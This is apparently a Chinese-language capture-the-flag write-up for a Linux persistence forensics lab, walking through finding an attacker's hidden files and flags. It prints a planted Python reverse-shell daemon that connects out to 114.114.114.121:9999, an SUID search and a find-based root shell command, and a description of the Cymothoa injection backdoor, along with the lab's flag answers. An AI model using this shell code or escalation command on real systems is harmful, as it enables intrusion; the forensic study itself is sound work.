Linux权限维持

靶机简介

ssh root@env.xj.edisec.net -p  密码  xjqxwcyc
1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5} 
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件  将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

这里看了一下web目录没什么东西,直接用D盾全盘查杀一下

这里挂载要指定端口,指定端口的形式是这样的:\sshfs.r\username@remote_ip!port\

emmm但是卡住了扫不出来东西

image-20240712163333073

最后是在/tmp目录下发现了一个隐藏文件,里面有python脚本/tmp/.temp/libprocesshider/1.py

image-20240712162238473

flag{109ccb5768c70638e24fb46ee7957e37}

其脚本内容

#!/usr/bin/python3

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

while 1:
        try:
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                pass
        time.sleep(2)

其反弹shell的ip和端口就是上面代码中的

flag{114.114.114.121:9999}

一开始找到一个1.sh的脚本,里面是一个bash反弹shell但是那个玩意不是flag,不知道是不是环境没怎么改。。。

查看黑客的提权命令,先看/etc/passwd

image-20240712162658912

有个ctf用户,切换到该用户执行下面命令找是否能够suid提权

find / -perm -u=s -type f 2>/dev/null

image-20240712162931598

发现find命令就能提权

其提权命令如下:

/usr/bin/find . -exec /bin/sh \; -quit

flag{7fd5884f493f4aaf96abee286ee04120}

emmm没想明白这个思路是怎么来的,看别人的wp,难道提权一定是suid吗😥

然后就是找注入代码的恶意工具,这里用下面这个命令查找

find / -name '.*' 2>/dev/null|grep -v 'sys'

image-20240712164100081

搜索可以知道这是一个注入工具:https://cn-sec.com/archives/2563485.html

Cymothoa是一款隐秘的后门工具,通过向目标主机上活跃的进程注入恶意代码来执行后门工作,这也反向说明了,实际上Cymothoa后门会拥有和原进程相同的权限,且Cymothoa是通过向系统进程注入shellcode去执行后门,所以不会像以前写过的许多后门一样创建自己的进程,这使得它的隐蔽性提高了很多。

所以其工具路径如下:/opt/.cymothoa-1-beta/cymothoa

flag{087c267368ece4fcf422ff733b51aed9}

最后执行一下这个1.py的脚本查询一下网络连接

python3 ./1.py
netstat -pantu
cat /proc/563/cmdline

image-20240712165626986

然后找到一个软链接,这个就是flag(没懂跟题目描述的步骤有什么关系

flag{/usr/bin/python3.4}

说实话是在没看懂这里是什么意思,看的别人的wp,有点意义不明。。。